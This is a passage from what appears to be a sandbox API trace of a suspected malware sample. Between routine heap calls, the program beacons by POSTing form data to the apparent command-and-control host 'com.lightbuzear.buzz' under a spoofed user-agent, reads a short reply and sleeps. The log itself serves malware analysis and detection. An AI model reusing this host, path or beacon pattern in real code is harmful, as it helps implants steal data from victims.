(in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0307.635] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0307.635] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0307.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0307.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0307.636] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0307.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0307.636] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0307.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0307.636] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0307.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0307.637] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0307.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cb28 [0307.637] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0307.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c960 [0307.637] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0307.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0307.637] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0307.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eed30 [0307.637] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0307.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0307.637] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0307.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0307.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0307.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef2d0 [0307.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0307.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0307.639] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0307.639] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0307.639] FreeLibrary (hLibModule=0x71780000) returned 1 [0307.639] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef2d0 | out: hHeap=0x4780000) returned 1 [0307.639] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0307.639] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef0c8 [0307.640] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0307.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0307.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0307.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0307.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0307.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0307.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0307.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0307.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0307.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0307.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cb28 [0307.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0307.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c960 [0307.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0307.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0307.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0307.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482cac8 [0307.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef3c0 [0307.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef3c0 | out: hHeap=0x4780000) returned 1 [0307.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0307.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef230 [0307.642] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0307.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef2f8 [0307.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0307.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0307.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0307.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0307.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0307.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0307.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0307.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0307.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0307.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c960 [0307.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0307.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c888 [0307.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0307.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0307.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c888 | out: hHeap=0x4780000) returned 1 [0307.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c888 [0307.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eef60 [0307.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eef60 | out: hHeap=0x4780000) returned 1 [0307.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0307.645] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0307.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0307.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0307.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0307.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0307.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0307.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0307.646] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0307.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0307.646] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0307.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c9a8 [0307.646] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0307.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c990 [0307.646] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0307.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0307.646] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c990 | out: hHeap=0x4780000) returned 1 [0307.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef0f0 [0307.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0307.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0307.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef0f0 | out: hHeap=0x4780000) returned 1 [0307.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef190 [0307.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0307.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eef88 [0307.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0307.648] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0307.648] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0307.648] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0307.649] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eef88 | out: hHeap=0x4780000) returned 1 [0307.649] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0307.649] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0307.649] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0307.649] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0307.649] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0307.649] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0307.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0307.650] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0307.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0307.650] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cb10 [0307.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0307.650] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb28 [0307.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb10 | out: hHeap=0x4780000) returned 1 [0307.650] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0307.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0307.650] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef0f0 [0307.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0307.651] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0307.651] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef0f0 | out: hHeap=0x4780000) returned 1 [0307.651] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef208 [0307.651] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0307.651] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eefd8 [0307.651] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0307.652] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0307.652] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0307.652] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0308.843] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eefd8 | out: hHeap=0x4780000) returned 1 [0308.843] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0308.843] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0308.843] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0308.843] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0308.844] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0308.844] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0308.844] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0308.844] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0308.844] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0308.844] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0308.844] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0308.844] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0308.844] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c990 [0308.844] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0308.844] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb10 [0308.844] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c990 | out: hHeap=0x4780000) returned 1 [0308.844] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0308.844] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb10 | out: hHeap=0x4780000) returned 1 [0308.844] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eefb0 [0308.844] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0308.844] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0308.844] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eefb0 | out: hHeap=0x4780000) returned 1 [0308.844] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef2a8 [0308.844] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0308.845] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef078 [0308.845] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0308.846] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0308.846] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0308.846] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0308.846] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef078 | out: hHeap=0x4780000) returned 1 [0308.846] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0308.846] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0308.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0308.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0308.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0308.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c990 [0308.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c9a8 [0308.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c990 | out: hHeap=0x4780000) returned 1 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0308.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef000 [0308.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0308.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef000 | out: hHeap=0x4780000) returned 1 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef000 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0308.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef2d0 [0308.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0308.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0308.849] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0308.849] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0308.849] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef2d0 | out: hHeap=0x4780000) returned 1 [0308.849] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0308.849] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0308.849] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0308.850] FreeLibrary (hLibModule=0x71570000) returned 1 [0308.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0308.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0308.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef2f8 | out: hHeap=0x4780000) returned 1 [0308.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef230 | out: hHeap=0x4780000) returned 1 [0308.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef0c8 | out: hHeap=0x4780000) returned 1 [0308.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec40 | out: hHeap=0x4780000) returned 1 [0308.851] Sleep (dwMilliseconds=0x2710) [0308.865] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0308.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0308.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0308.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0308.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0308.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0308.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0308.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0308.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0308.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c9c0 [0308.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0308.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482caf8 [0308.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9c0 | out: hHeap=0x4780000) returned 1 [0308.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0308.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482caf8 | out: hHeap=0x4780000) returned 1 [0308.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482caf8 [0308.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0308.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec40 | out: hHeap=0x4780000) returned 1 [0308.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0308.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0308.867] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0308.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0308.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0308.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0308.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0308.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0308.867] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0308.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0308.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0308.868] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0308.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c960 [0308.868] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0308.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb10 [0308.868] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0308.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0308.868] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb10 | out: hHeap=0x4780000) returned 1 [0308.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef230 [0308.868] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0308.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0308.868] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef230 | out: hHeap=0x4780000) returned 1 [0308.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef230 [0308.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0308.868] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef370 [0308.868] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: 